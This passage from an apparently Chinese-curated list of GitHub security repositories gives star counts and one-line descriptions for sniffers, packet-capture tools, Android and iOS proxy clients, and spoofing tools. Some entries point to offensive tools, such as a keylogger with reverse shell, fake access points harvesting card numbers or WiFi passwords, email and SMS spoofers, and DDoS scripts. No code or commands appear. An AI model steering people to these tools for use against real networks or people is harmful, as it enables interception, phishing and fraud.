[ajackal/cherrywasp](https://github.com/ajackal/cherrywasp) An 802.11 probe request and beacon sniffer. - [**7**ๆ˜Ÿ][8m] [C#] [artman41/fenderstratocastorsniffer](https://github.com/artman41/fenderstratocastorsniffer) - [**7**ๆ˜Ÿ][2m] [Py] [programmingathlete/brutesniffing_fisher](https://github.com/programmingathlete/brutesniffing_fisher) hacking tool - [**6**ๆ˜Ÿ][2y] [Go] [amyangxyz/dnssniffer](https://github.com/amyangxyz/dnssniffer) DNSQuery Sniffer in Golang - [**6**ๆ˜Ÿ][2y] [Py] [crcarlo/arp-spoofing-python](https://github.com/crcarlo/arp-spoofing-python) A script for sniffing internet traffic between a machine and the gateway in your local network. - [**6**ๆ˜Ÿ][3y] [Go] [jheise/dns-probe](https://github.com/jheise/dns-probe) Sniff for dns traffic and create a zero mq stream for it - [**5**ๆ˜Ÿ][2y] [Py] [daymorelah/packetanalyzerandsniffer](https://github.com/daymorelah/packetanalyzerandsniffer) A simple python module that implements a packet sniffer and analyser. It sniffs and analyses TCP, UDP, IPV4 and IPV6 traffic. - [**5**ๆ˜Ÿ][5y] [Ruby] [dotboris/hidden-hippo](https://github.com/dotboris/hidden-hippo) A tool that identifies the people around you by sniffing network traffic and mining social networks. - [**5**ๆ˜Ÿ][3y] [roboremo/nrf24-demodulator](https://github.com/roboremo/nrf24-demodulator) Sniff NRF24L01 (and clones) packets and veiw bit-level structure using GNU Radio - [**5**ๆ˜Ÿ][2y] [Lua] [spacewander/lua-resty-mime-sniff](https://github.com/spacewander/lua-resty-mime-sniff) Sniff the real MIME type of given data in your OpenResty app - [**5**ๆ˜Ÿ][3y] [C++] [andreabont/project-riddle](https://github.com/andreabont/project-riddle) Modular Network Packet Sniffer - [**4**ๆ˜Ÿ][7y] [Shell] [dc414/fakeap_pwnage](https://github.com/dc414/fakeap_pwnage) A fakeAP to sniff traffic or get CC numbers. - [**4**ๆ˜Ÿ][6y] [Shell] [logic-gate/penbang](https://github.com/logic-gate/penbang) Penbang is a collection of tools aimed at the openbox environment. It includes Network Exploits, Vulnerability Assessment/Exploits, Network Analysis, Social Engineering tools, I.G.C, dsniff suite, and irpas. As well as a simple way of launching them. - [**4**ๆ˜Ÿ][3y] [Py] [mellow-hype/keysniffer-poc](https://github.com/mellow-hype/keysniffer-poc) Simple PoC Linux keysniffer showing impact of a lack of GUI-isolation in X display server. - [**4**ๆ˜Ÿ][4y] [Visual Basic .NET] [pyblendnet-js/realtermbuspiratesniff](https://github.com/pyblendnet-js/realtermbuspiratesniff) Bus Pirate SPI sniffer using RealTerm for highspeed transfer - [**4**ๆ˜Ÿ][5y] [Ruby] [sneakersinc/sniffmypacketsv2-web](https://github.com/sneakersinc/sniffmypacketsv2-web) Web framework for sniffmypackets v2 - [**4**ๆ˜Ÿ][2y] [Py] [wangjksjtu/jksniffer](https://github.com/wangjksjtu/jksniffer) An implementation of Sniffer Tool using Python - [**4**ๆ˜Ÿ][29d] [JS] [sipcapture/hepjack.js](https://github.com/sipcapture/hepjack.js) Elegantly Sniff Forward-Secrecy TLS/SIP to HEP at the source using Frida - [**4**ๆ˜Ÿ][2m] [Py] [tastypeanut/carmela](https://github.com/tastypeanut/carmela) Makes network sniffing easy for everyone. Still a work in progress. - [**3**ๆ˜Ÿ][4y] [C++] [aschen/cameleon-sniffer](https://github.com/aschen/cameleon-sniffer) A modular network sniffer daemon written in C++ - [**3**ๆ˜Ÿ][2y] [Py] [orf53975/malware](https://github.com/orf53975/malware) Rootkits | Backdoors | Sniffers | Virus | Ransomware | Steganography | Cryptography | Shellcodes | Webshells | Keylogger | Botnets | Worms | Other Network Tools - [**3**ๆ˜Ÿ][5y] [C++] [simonberson/chromeurlsniffer](https://github.com/simonberson/chromeurlsniffer) Hook to Chrome Browser URL and show the current URL on simple textbox - [**3**ๆ˜Ÿ][4y] [Py] [wirelesshack/desniffer](https://github.com/wirelesshack/desniffer) 802.11 wireless sniffer - [**3**ๆ˜Ÿ][4y] [C] [bwoolf1122/tcp-seqnum](https://github.com/bwoolf1122/tcp-seqnum) Means to sniff 802.11 traffic and obtain TCP session info using netfiter_queue. Use that data to construct a packet in scappy. - [**3**ๆ˜Ÿ][7y] [Py] [0x0d/wallofshame](https://github.com/0x0d/wallofshame) Multi protocol sniffer, created for ChaosConstruction conference HackSpace - [**2**ๆ˜Ÿ][10m] [Shell] [b3n-j4m1n/flood-kick-sniff](https://github.com/b3n-j4m1n/flood-kick-sniff) Known Beacons attack tool - [**2**ๆ˜Ÿ][1y] [Go] [progtramder/webproxy](https://github.com/progtramder/webproxy) A fiddler-like webproxy, support sniffing http/https content by implementing 'Sniffer' interface - ้‡ๅคๅŒบๆฎต: [ๅทฅๅ…ท->fiddler](#31d28e8b2cf6c06411cd5d178dbd3e77) | - [**2**ๆ˜Ÿ][5y] [Py] [depthdeluxe/dot11sniffer](https://github.com/depthdeluxe/dot11sniffer) Sniffs 802.11 traffic and counts the number of active wireless devices in an area - [**2**ๆ˜Ÿ][2y] [C] [samclarke2012/ssidentity](https://github.com/samclarke2012/ssidentity) Passive sniffing of 802.11 probe requests, stored in a central database. - [**2**ๆ˜Ÿ][9y] [de-ibh/mupe](https://github.com/de-ibh/mupe) MUltiPath Estimator - Create statistical analysis of 802.11 Radiotap sniffs - [**1**ๆ˜Ÿ][3y] [Py] [wouterbudding/scapygelftograylog2](https://github.com/wouterbudding/scapygelftograylog2) sniff some 802.11 packages and send the date and MAC with GELF UDP to Graylog2 - [**1**ๆ˜Ÿ][4m] [Perl] [briandfoy/httpsniffer](https://github.com/briandfoy/httpsniffer) - [**1**ๆ˜Ÿ][4y] [Py] [dcrisan/wifi-802.11-demo-sniffer](https://github.com/dcrisan/wifi-802.11-demo-sniffer) This 802.11 sniffer written in Python provides a useful tool to raise awareness at the amount of data phones release for anyone to read. - [**1**ๆ˜Ÿ][5y] [C] [gauravpatwardhan/wireless-sniffer](https://github.com/gauravpatwardhan/wireless-sniffer) A 802.11 wireless sniffer tool - [**1**ๆ˜Ÿ][6y] [C] [saintkepha/airtraf](https://github.com/saintkepha/airtraf) wireless 802.11 network sniffer and analyzer - [**0**ๆ˜Ÿ][11y] [C] [jackiexie168/como](https://github.com/jackiexie168/como) CoMo is a passive monitoring system that supports arbitrary real time traffic queries. Data streams may have different formats (e.g., packet/flow sequences, etc.) and originate from different platforms (e.g, packet sniffers, routers, wireless APs, ...). - [**0**ๆ˜Ÿ][7y] [Py] [dappiu/rifsniff](https://github.com/dappiu/rifsniff) RIfSniff is a Remote Interface Sniffer ### <a id="d7485f829bd85cd784ff582cbddc8624"></a>ๆ•่Žท&&Capture - [**1429**ๆ˜Ÿ][3m] [Go] [google/stenographer](https://github.com/google/stenographer) ๆ•ฐๆฎๅŒ…ๆ•่Žท่งฃๅ†ณๆ–นๆกˆ๏ผŒๅฐ†ๆ‰€ๆœ‰ๆ•ฐๆฎๅŒ…ๅฟซ้€ŸๅŽๅฐๅค„็†ๅˆฐ็ฃ็›˜๏ผŒ็„ถๅŽๆไพ›ๅฏน่ฟ™ไบ›ๆ•ฐๆฎๅŒ…ๅญ้›†็š„็ฎ€ๅ•ใ€ๅฟซ้€Ÿ่ฎฟ้—ฎ - [**909**ๆ˜Ÿ][4d] [C++] [seladb/pcapplusplus](https://github.com/seladb/pcapplusplus) ๅคšๅนณๅฐC ++ๅบ“๏ผŒ็”จไบŽๆ•่Žทใ€่งฃๆžๅ’Œๅค„็†็ฝ‘็ปœๆ•ฐๆฎๅŒ…ใ€‚ไธบๆœ€ๅ—ๆฌข่ฟŽ็š„ๆ•ฐๆฎๅŒ…ๅค„็†ๅผ•ๆ“Ž๏ผˆไพ‹ๅฆ‚libpcap๏ผŒWinPcap๏ผŒDPDKๅ’ŒPF_RING๏ผ‰ๆไพ›ไบ†C ++ๅŒ…่ฃ…ๅ™จใ€‚้ซ˜ๆ•ˆใ€ๅผบๅคงไธ”ๆ˜“ไบŽไฝฟ็”จใ€‚ - [**883**ๆ˜Ÿ][1m] [C] [cisco/joy](https://github.com/cisco/joy) ๆ•่Žทๅ’Œๅˆ†ๆž็ฝ‘็ปœๆตๆ•ฐๆฎๅ’Œintraflowๆ•ฐๆฎ๏ผŒ็”จไบŽ็ฝ‘็ปœ็ ”็ฉถใ€ๅ–่ฏๅ’Œๅฎ‰ๅ…จ็›‘่ง† - [**854**ๆ˜Ÿ][t] [C] [zerbea/hcxtools](https://github.com/zerbea/hcxtools) ๆ•่Žทๆ— ็บฟๅฑ€ๅŸŸ็ฝ‘ๆต้‡๏ผŒๅนถๅฐ†ๅ…ถ่ฝฌๆขไธบhashcatๆ ผๅผๅ’ŒJohn Ripperๆ ผๅผ - [**680**ๆ˜Ÿ][t] [C] [zerbea/hcxdumptool](https://github.com/zerbea/hcxdumptool) ๆ•่Žทๆฅ่‡ชๆ— ็บฟ่ฎพๅค‡็š„ๆ•ฐๆฎๅŒ… - [**456**ๆ˜Ÿ][3y] [C] [haka-security/haka](https://github.com/haka-security/haka) ๆ•่ŽทTCP / IPๆ•ฐๆฎๅŒ…๏ผŒๅนถๆ นๆฎLua็ญ–็•ฅๆ–‡ไปถๅฏนๅ…ถ่ฟ›่กŒ่ฟ‡ๆปค - [**423**ๆ˜Ÿ][3m] [C] [desowin/usbpcap](https://github.com/desowin/usbpcap) USBๆ•ฐๆฎๅŒ…ๆ•่Žท๏ผŒ็”จไบŽWindows - [**214**ๆ˜Ÿ][3m] [C] [dns-oarc/dnscap](https://github.com/dns-oarc/dnscap) ไธ“ไธบDNSๆต้‡่ฎพ่ฎก็š„็ฝ‘็ปœๆ•่Žทๅทฅๅ…ท - [**141**ๆ˜Ÿ][2y] [Py] [secureworks/flowsynth](https://github.com/secureworks/flowsynth) ๅฟซ้€Ÿๅฏน็ฝ‘็ปœๆต้‡่ฟ›่กŒๅปบๆจก๏ผŒๅฏ็”จไบŽ็”ŸๆˆๅŸบไบŽๆ–‡ๆœฌ็š„ๆ•ฐๆฎๅŒ…็š„ๅๅ…ญ่ฟ›ๅˆถ่ฝฌๅ‚จ๏ผŒๅ’Œlibpcapๆ ผๅผ็š„ๆ•ฐๆฎๅŒ…ๆ•่Žท - [**110**ๆ˜Ÿ][3m] [C] [sipcapture/captagent](https://github.com/sipcapture/captagent) ็”จไบŽRTC็š„HEPๆ•ฐๆฎๅŒ…ๆ•่Žทๅ’Œ้•œๅƒๆก†ๆžถ๏ผŒๅŠŸ่ƒฝๅผบๅคงใ€็ตๆดปใ€ๅฎŒๅ…จๆจกๅ—ๅŒ–ใ€‚ๅฏ็”จไบŽไปปไฝ•็ฑปๅž‹็š„IPๅ่ฎฎๅ’Œๅฐ่ฃ…ๆ–นๆณ• - [**46**ๆ˜Ÿ][3y] [C] [rpcapd-linux/rpcapd-linux](https://github.com/rpcapd-linux/rpcapd-linux) ไธบWindows็‰ˆๆœฌ็š„Wiresharkๆไพ›่ฟœ็จ‹ๆต้‡ๆ•่Žท็š„ๅฎˆๆŠค็จ‹ๅบ - ้‡ๅคๅŒบๆฎต: [ๅทฅๅ…ท->Wireshark](#6fa0e0d1f898fba299b2566a33602841) | - [**32**ๆ˜Ÿ][6y] [C] [nbareil/net2pcap](https://github.com/nbareil/net2pcap) ็ฑปไผผไบŽtcpdump็š„ๆ•ฐๆฎๅŒ…ๆ•่Žทๅทฅๅ…ท๏ผŒๅชไพ่ต–libc - [**29**ๆ˜Ÿ][2y] [Py] [nsacyber/serial2pcap](https://github.com/nsacyber/serial2pcap) ๅฐ†้€šๅธธไปŽๅทฅไธšๆŽงๅˆถ็ณป็ปŸ่ฎพๅค‡ๆ”ถ้›†็š„ไธฒ่กŒIPๆ•ฐๆฎ่ฝฌๆขไธบๆ›ดๅธธ็”จ็š„ๆ•ฐๆฎๅŒ…ๆ•่Žท๏ผˆPCAP๏ผ‰ๆ ผๅผ - [**13**ๆ˜Ÿ][6m] [Java] [jxnet/jxnet](https://github.com/jxnet/jxnet) Jxnet is a Java library for capturing and sending custom network packet buffers with no copies. Jxnet wraps a native packet capture library (libpcap/winpcap/npcap) via JNI (Java Native Interface). ### <a id="471c124b012dbde8ea3288f35667efc8"></a>ๆต้‡ๆฃ€ๆต‹ - [**3341**ๆ˜Ÿ][4d] [Py] [stamparm/maltrail](https://github.com/stamparm/maltrail) ๆถๆ„็ฝ‘็ปœๆต้‡ๆฃ€ๆต‹็ณป็ปŸ *** ## <a id="384f5e1bef62f815c6745062f2975ba7"></a>ๆ–‡็ซ  # <a id="c63cbfa77e689e485fc2d8bc5051f229"></a>Android *** ## <a id="863839860fab4b8601905205cac9b54f"></a>ๅทฅๅ…ท - [**27960**ๆ˜Ÿ][9d] [Kotlin] [shadowsocks/shadowsocks-android](https://github.com/shadowsocks/shadowsocks-android) A shadowsocks client for Android - [**4966**ๆ˜Ÿ][12d] [TS] [jigsaw-code/outline-client](https://github.com/jigsaw-code/outline-client) Outline clients, developed by Jigsaw. The Outline clients use the popular Shadowsocks protocol, and lean on the Cordova and Electron frameworks to support Windows, Android / ChromeOS, Linux, iOS and macOS. - ้‡ๅคๅŒบๆฎต: [iOS->ๅทฅๅ…ท](#692d86299dedab073fbb6144a5b2bd64) | - [**3145**ๆ˜Ÿ][2y] [shadowsocksr-backup/shadowsocksr-android](https://github.com/shadowsocksr-backup/shadowsocksr-android) A ShadowsocksR client for Android - [**1338**ๆ˜Ÿ][1y] [C] [madeye/proxydroid](https://github.com/madeye/proxydroid) Global Proxy for Android - [**997**ๆ˜Ÿ][12m] [Java] [huolizhuminh/networkpacketcapture](https://github.com/huolizhuminh/networkpacketcapture) It is used to capture network packet via Android VPN. - [**534**ๆ˜Ÿ][2y] [Java] [dawei101/shadowsocks-android-java](https://github.com/dawei101/shadowsocks-android-java) Shadowsocks android client, pure java version - [**527**ๆ˜Ÿ][4y] [C] [neilalexander/sigmavpn](https://github.com/neilalexander/sigmavpn) Light-weight, secure and modular VPN solution which makes use of NaCl encryption (also available for Android using jnacl in "sigmavpn-android") - [**450**ๆ˜Ÿ][2m] [Kotlin] [hmbsbige/shadowsocksr-android](https://github.com/hmbsbige/shadowsocksr-android) A ShadowsocksR client for Android, written in Kotlin. - [**368**ๆ˜Ÿ][3y] [Java] [ssun125/lanmitm](https://github.com/ssun125/lanmitm) Androidไธญ้—ดไบบๆ”ปๅ‡ปๆต‹่ฏ•ๅทฅๅ…ท - [**219**ๆ˜Ÿ][2y] [itrump/shadowsocksrss](https://github.com/itrump/shadowsocksrss) shadowsocksR backup, windows / android / mac downloads, source code backup - [**201**ๆ˜Ÿ][4m] [Kotlin] [shadowsocks/v2ray-plugin-android](https://github.com/shadowsocks/v2ray-plugin-android) A SIP003 V2ray plugin on Android - [**95**ๆ˜Ÿ][2y] [guardianproject/tor-browser](https://github.com/guardianproject/tor-browser) UPDATE: Orfox is being replaced by Tor Browser for Android. All future work and comments will be handled by Tor Project. - ้‡ๅคๅŒบๆฎต: [ๅŒฟๅ็ฝ‘็ปœ->ๅทฅๅ…ท->Tor](#e99ba5f3de02f68412b13ca718a0afb6) | - [**88**ๆ˜Ÿ][1y] [Java] [frpccluster/frpc-android](https://github.com/frpccluster/frpc-android) Android,ๅฎ‰ๅ“็‰ˆfrpc๏ผŒไธ€ไธชๅฟซ้€Ÿๅๅ‘ไปฃ็†๏ผŒๅฏๅธฎๅŠฉๆ‚จๅฐ†NATๆˆ–้˜ฒ็ซๅข™ๅŽ้ข็š„ๆœฌๅœฐๆœๅŠกๅ™จๆšด้œฒ็ป™Internetใ€‚ - [**86**ๆ˜Ÿ][1y] [Java] [vpnht/android](https://github.com/vpnht/android) VPN.ht Android Application. Based on ics-openvpn. - [**74**ๆ˜Ÿ][1y] [Shell] [thelinuxchoice/keydroid](https://github.com/thelinuxchoice/keydroid) Android Keylogger + Reverse Shell - [**34**ๆ˜Ÿ][3y] [C] [uwnetworkslab/cordova-plugin-tun2socks](https://github.com/uwnetworkslab/cordova-plugin-tun2socks) Cordova plugin to enable a system-wide VPN for Android devices. - [**33**ๆ˜Ÿ][1y] [Shell] [cryptolok/ghostinthechaos](https://github.com/cryptolok/ghostinthechaos) Chaotic Crypto Stealth VPN for Anonymity and Untraceable Hacking Attacks with Linux and Android - [**32**ๆ˜Ÿ][5y] [Ruby] [jduck/addjsif](https://github.com/jduck/addjsif) Metasploit Exploit Module for the Android addJavascriptInterface Issue (MITM) - [**28**ๆ˜Ÿ][2y] [C] [shadowsocksr-live/ssrdroid](https://github.com/shadowsocksr-live/ssrdroid) ShadowsocksR (SSR) for Android - [**23**ๆ˜Ÿ][1y] [Java] [shivam141296/android-firewall](https://github.com/shivam141296/android-firewall) Basic netguard app from playstore ,reduced to its minimum level for vpn and firewall logic - [**22**ๆ˜Ÿ][4y] [C] [shadowsocks/openssl-android](https://github.com/shadowsocks/openssl-android) A fork of OpenSSL for shadowsocks-android # <a id="70857140d346b443fe3b7ea3046f702a"></a>iOS *** ## <a id="692d86299dedab073fbb6144a5b2bd64"></a>ๅทฅๅ…ท - [**7958**ๆ˜Ÿ][4y] [ObjC] [shadowsocks/shadowsocks-ios](https://github.com/shadowsocks/shadowsocks-ios) Removed according to regulations. - [**6645**ๆ˜Ÿ][8d] [Py] [h2y/shadowrocket-adblock-rules](https://github.com/h2y/shadowrocket-adblock-rules) ๆไพ›ๅคšๆฌพ Shadowrocket ่ง„ๅˆ™๏ผŒๅธฆๅนฟๅ‘Š่ฟ‡ๆปคๅŠŸ่ƒฝใ€‚็”จไบŽ iOS ๆœช่ถŠ็‹ฑ่ฎพๅค‡้€‰ๆ‹ฉๆ€งๅœฐ่‡ชๅŠจ็ฟปๅข™ใ€‚ - [**4966**ๆ˜Ÿ][12d] [TS] [jigsaw-code/outline-client](https://github.com/jigsaw-code/outline-client) Outline clients, developed by Jigsaw. The Outline clients use the popular Shadowsocks protocol, and lean on the Cordova and Electron frameworks to support Windows, Android / ChromeOS, Linux, iOS and macOS. - ้‡ๅคๅŒบๆฎต: [Android->ๅทฅๅ…ท](#863839860fab4b8601905205cac9b54f) | - [**1701**ๆ˜Ÿ][1y] [Swift] [haxpor/potatso](https://github.com/haxpor/potatso) Potatso is an iOS client that implements Shadowsocks proxy with the leverage of NetworkExtension framework. ***This project is unmaintained, try taking a look at this fork - [**1211**ๆ˜Ÿ][t] [ObjC] [onionbrowser/onionbrowser](https://github.com/onionbrowser/onionbrowser) An open-source, privacy-enhancing web browser for iOS, utilizing the Tor anonymity network - ้‡ๅคๅŒบๆฎต: [ๅŒฟๅ็ฝ‘็ปœ->ๅทฅๅ…ท->Tor](#e99ba5f3de02f68412b13ca718a0afb6) | - [**857**ๆ˜Ÿ][3y] [Py] [hubert3/isniff-gps](https://github.com/hubert3/isniff-gps) Passive sniffing tool for capturing and visualising WiFi location data disclosed by iOS devices - [**407**ๆ˜Ÿ][3y] [C] [robertyim/shadowsocksx](https://github.com/RobertYim/ShadowsocksX) Fork of shadowsocks-iOS - [**380**ๆ˜Ÿ][5y] [Py] [mfrister/pushproxy](https://github.com/mfrister/pushproxy) A man-in-the-middle proxy for iOS and OS X device push connections - [**133**ๆ˜Ÿ][3y] [Swift] [kidneyband/potatso-ios](https://github.com/kidneyband/potatso-ios) Potatso is an iOS client that implements Shadowsocks proxy with the leverage of NetworkExtension framework in iOS 9. - [**121**ๆ˜Ÿ][2y] [Swift] [lxdcn/nepackettunnelvpndemo](https://github.com/lxdcn/nepackettunnelvpndemo) iOS VPN client implementation demo based on iOS9 NetworkExtension NETunnelProvider APIs - [**107**ๆ˜Ÿ][12m] [Swift] [lettleprince/qladder](https://github.com/lettleprince/qladder) QLadder is a project for iOS client. It uses shadowsocks as server-side. - [**35**ๆ˜Ÿ][2y] [unbinilium/surge](https://github.com/unbinilium/surge) Shadowsocks Encrypt Support Module for Surge APP, iOS & MacOS Configuration - [**25**ๆ˜Ÿ][1y] [ObjC] [skifary/c4msis](https://github.com/skifary/c4msis) ios shadowsocks app based on NEKit # <a id="53da0cc607b98c444ec0e50a0b77f754"></a>็ฝ‘็ปœๆ”ปๅ‡ป *** ## <a id="295e14c39bf33cd5136be8ced9383746"></a>ๅทฅๅ…ท ### <a id="07f06751f1de7ddd1f6a95323f0191c8"></a>PortKnocking - [**515**ๆ˜Ÿ][14d] [Perl] [mrash/fwknop](https://github.com/mrash/fwknop) Single Packet Authorization > Port Knocking - [**371**ๆ˜Ÿ][7y] [Py] [moxie0/knockknock](https://github.com/moxie0/knockknock) ็ฎ€ๆ˜“ใ€ๅฎ‰ๅ…จไธ”้š่”ฝ็š„Port Knockingๅทฅๅ…ท๏ผŒไธไฝฟ็”จlibpcap๏ผŒไนŸไธ็ป‘ๅฎšๅˆฐsocketๆŽฅๅฃ ### <a id="f855508acfc870b1f0d90ff316f1dd75"></a>ไผช้€ &&Spoof - [**2174**ๆ˜Ÿ][1y] [JS] [iam4x/pokemongo-webspoof](https://github.com/iam4x/pokemongo-webspoof) ๅœจPokรฉmonGoไผช้€ iOS่ฎพๅค‡GPSไฝ็ฝฎ - [**256**ๆ˜Ÿ][3y] [C] [w-shackleton/android-netspoof](https://github.com/w-shackleton/android-netspoof) Network Spoofer - [**168**ๆ˜Ÿ][6d] [JS] [sereneblue/chameleon](https://github.com/sereneblue/chameleon) A WebExtension port of Random Agent Spoofer - [**121**ๆ˜Ÿ][12m] [Py] [byt3bl33d3r/arpspoof](https://github.com/byt3bl33d3r/arpspoof) Python clone of arpspoof that can poison hosts via arp-requests as well as arp-replies - [**95**ๆ˜Ÿ][9m] [C++] [hlldz/apc-ppid](https://github.com/hlldz/apc-ppid) Adds a user-mode asynchronous procedure call (APC) object to the APC queue of the specified thread and spoof the Parent Process. - [**55**ๆ˜Ÿ][5y] [PHP] [troyhunt/pineapplesurprise](https://github.com/troyhunt/pineapplesurprise) Pineapple Surprise! is a PHP implementation for the Wi-Fi Pineapple or "Jasager". Used in conjunction with dnsspoof it will serve a "surprise" to any clients connected to the device when they make an HTTP request. - [**52**ๆ˜Ÿ][9m] [Py] [fireeye/adfspoof](https://github.com/fireeye/adfspoof) forge AD FS security tokens - [**46**ๆ˜Ÿ][2m] [C++] [125k/esp8266_wifi_captive_portal](https://github.com/125k/esp8266_wifi_captive_portal) WiFi captive portal for NodeMCU (ESP8266 Module) with DNS spoofing. It phishes the WiFi password. - [**23**ๆ˜Ÿ][3m] [Visual Basic .NET] [henriksb/extensionspoofer](https://github.com/henriksb/extensionspoofer) Spoof file icons and extensions in Windows - [**21**ๆ˜Ÿ][9m] [Shell] [thelinuxchoice/lizard](https://github.com/thelinuxchoice/lizard) Extension spoofer and reveser shell generator - [**20**ๆ˜Ÿ][1y] [C] [nofvcks/aimkit-pasted-driver](https://github.com/nofvcks/aimkit-pasted-driver) The BlackBone + Chinese spoofer paste that GreenTea denied. AimKit is a scam. GreenTea is a fraud. Don't waste your money. - [**19**ๆ˜Ÿ][3y] [Py] [wjdigby/apd_launchpad](https://github.com/wjdigby/apd_launchpad) Script for generating hostapd-wpe configuration files and spoofed certificates - [**18**ๆ˜Ÿ][2y] [Py] [zxsecurity/nmeadesync](https://github.com/zxsecurity/nmeadesync) A tool which allows an attacker to change the time on a GPS-enabled NTP server by using spoofed NEMA sentences - [**17**ๆ˜Ÿ][9y] [C] [maurotfilho/dns-spoof](https://github.com/maurotfilho/dns-spoof) DNS Spoof - [**17**ๆ˜Ÿ][11m] [JS] [tobinshields/zaqar_emailspoofer](https://github.com/tobinshields/zaqar_emailspoofer) A powerful PHP email spoofer with a polished UI, rich text editor, and multiple sending options. - [**17**ๆ˜Ÿ][3y] [Py] [blechschmidt/fakeroute](https://github.com/blechschmidt/fakeroute) Simple traceroute fake hop generator through IP spoofing - [**16**ๆ˜Ÿ][2y] [C#] [rushyo/vindicatetool](https://github.com/rushyo/vindicatetool) LLMNR/NBNS/mDNS Spoofing Detection Toolkit - [**15**ๆ˜Ÿ][2y] [Swift] [hungtruong/deadringer](https://github.com/hungtruong/deadringer) A proof of concept iPhone X lock screen spoof - [**15**ๆ˜Ÿ][6y] [Java] [mcourteaux/spooferbt](https://github.com/mcourteaux/spooferbt) Relay torrent tracker communication via TCP to bypass a blocked UDP network. - [**14**ๆ˜Ÿ][3y] [C] [coolervoid/hyde](https://github.com/coolervoid/hyde) just another tool in C to test DoS spoofing - beta - [**14**ๆ˜Ÿ][2y] [Py] [vtr0n/fakeap](https://github.com/vtr0n/fakeap) Fake access point using dns spoof and ssl stripping - [**13**ๆ˜Ÿ][6y] [Py] [zackiles/rspoof](https://github.com/zackiles/rspoof) Wifi Automated Fake HotSpot Hijacking with aicrack-ng, airbase, ssl-strip, and dns spoof in Python. - [**12**ๆ˜Ÿ][2y] [Go] [virus-v/arpzebra](https://github.com/virus-v/arpzebra) ARP+DNSๆฌบ้ช—ๅทฅๅ…ท๏ผŒ็ฝ‘็ปœๅฎ‰ๅ…จ็ฌฌไธ‰ๆฌกๅฎž้ชŒ๏ผŒ่ฏพๅ ‚ๆผ”็คบ็”จ๏ผŒไธฅ็ฆ้žๆณ•็”จ้€”ใ€‚ARPSpoof๏ผŒwifi hijack๏ผŒdns spoof - [**12**ๆ˜Ÿ][2y] [Py] [imadhsissou/python-arp-spoofer](https://github.com/imadhsissou/python-arp-spoofer) A friendly command-line spoofing tool written in python using scapy and netifaces. - ้‡ๅคๅŒบๆฎต: [ๅทฅๅ…ท->Scapy](#01f99d208e245eb44f15f720043b50d4) | - [**12**ๆ˜Ÿ][3y] [Go] [sabey/spoofgo](https://github.com/sabey/spoofgo) An Application for Spoofing Movement written in Golang - [**9**ๆ˜Ÿ][2y] [Py] [balaganeshgbhackers/emailspoofing](https://github.com/balaganeshgbhackers/emailspoofing) - [**9**ๆ˜Ÿ][4y] [Perl] [davi200180/ddos-scripts](https://github.com/davi200180/ddos-scripts) Diversi Script installabili e utilizzabili su Server Linux (Spoof e non) per poter fare attacchi DDoS - [**9**ๆ˜Ÿ][2y] [Py] [porthunter/smoof](https://github.com/porthunter/smoof) SMS Spoofer for Social Engineering/Pentest Engagements - [**9**ๆ˜Ÿ][5y] [PHP] [xtr4nge/module_dnsspoof](https://github.com/xtr4nge/module_dnsspoof) FruityWifi dnsspoof module - [**9**ๆ˜Ÿ][6y] [sin5678/zxarps](https://github.com/sin5678/zxarps) arp spoof tool by lzx - [**8**ๆ˜Ÿ][5y] [Py] [ickerwx/arpspoof](https://github.com/ickerwx/arpspoof) ARP poisoning tool written in python with command line interface to add and remove targets on the fly - [**8**ๆ˜Ÿ][4y] [Shell] [jgamblin/mana-common](https://github.com/jgamblin/mana-common) Using Mana to Spoof Common SSIDs - [**6**ๆ˜Ÿ][10m] [Py] [avantasia/inventedattack](https://github.com/avantasia/inventedattack) A POC attack combining IP SPoofing, SYN Flood and IP Fragmentation - [**6**ๆ˜Ÿ][9m] [C++] [rgerganov/spoof_temp](https://github.com/rgerganov/spoof_temp) Spoof temperature sensor with HackRF - [**6**ๆ˜Ÿ][3y] [Py] [securitymouse/moops-public](https://github.com/securitymouse/moops-public) My Object Oriented Packet Spoofer - [**6**ๆ˜Ÿ][13d] [Go] [irai/arp](https://github.com/irai/arp) A go package to monitor ARP changes and notify when mac is online or offline. Also allow forced IP address change (IP spoofing). - [**4**ๆ˜Ÿ][3y] [HTML] [649/cve-2017-5415](https://github.com/649/cve-2017-5415) Addressbar spoofing through blob URL (Firefox browser). An attack can use a blob URL and script to spoof an arbitrary addressbar URL prefaced by blob: as the protocol, leading to user confusion and further spoofing attacks. - [**4**ๆ˜Ÿ][3y] [SourcePawn] [lordzy/safedialogs](https://github.com/lordzy/safedialogs) safeDialogs prevents the server from receiving fake or spoofed dialog responses. This includes faking dialog ID, listitem or even the inputtext in cases of lists. Faking listitem or inputtext can lead to many risks of user breaking into server security depending on how they're used. This include ensures that everything's safe and also contains aโ€ฆ - [**3**ๆ˜Ÿ][5m] [Py] [tg12/slow_the_bots](https://github.com/tg12/slow_the_bots) Slow the bot's by spoofing what they are looking for! - [**2**ๆ˜Ÿ][3y] [Java] [simonfrey/netsecure](https://github.com/simonfrey/netSecure) Macaddress Spoofing - IPv6 Randomising - SYN Attack Protection *** Android Root App - [**1**ๆ˜Ÿ][5y] [HTML] [qfc9/email-spoof](https://github.com/qfc9/email-spoof) A template on how to email spoof people - [**1**ๆ˜Ÿ][4y] [C] [garbaz/ipspoof](https://github.com/garbaz/ipspoof) IP spoof stuff - [**0**ๆ˜Ÿ][5y] [C++] [illahaha/zxarps](https://github.com/illahaha/zxarps) arpspoof - [**0**ๆ˜Ÿ][5y] [oxtoacart/flashlight](https://github.com/oxtoacart/flashlight) Lightweight host-spoofing web proxy written in go - [**0**ๆ˜Ÿ][3y] [Java] [uddhavpgautam/ip-spoofing-detection-prevention-for-network-intrusion-detection-prevention-based-on-tcp-seq-number](https://github.com/uddhavpgautam/ip-spoofing-detection-prevention-for-network-intrusion-detection-prevention-based-on-tcp-seq-number) IP Spoofing detection prevention for network intrusion detection prevention based on TCP sequence number prediction attack ### <a id="62b461e2ceead9edb75c1b51f6eecdfd"></a>ๆฃ€ๆต‹็ป•่ฟ‡ - [**3189**ๆ˜Ÿ][2m] [C] [valdikss/goodbyedpi](https://github.com/valdikss/goodbyedpi) ็ป•่ฟ‡่ฎธๅคšๅทฒ็Ÿฅ็š„็ฝ‘็ปœๆœๅŠกๆไพ›ๅ•†ๆไพ›็š„้˜ปๆญข่ฎฟ้—ฎๆŸไบ›็ฝ‘็ซ™็š„ๆทฑๅบฆๆ•ฐๆฎๅŒ…ๆฃ€ๆŸฅ็ณป็ปŸ ### <a id="3bd67ee9f322e2c85854991c85ed6da0"></a>ๆŠ•ๆฏ’&&Poisoning - [**5173**ๆ˜Ÿ][1y] [JS] 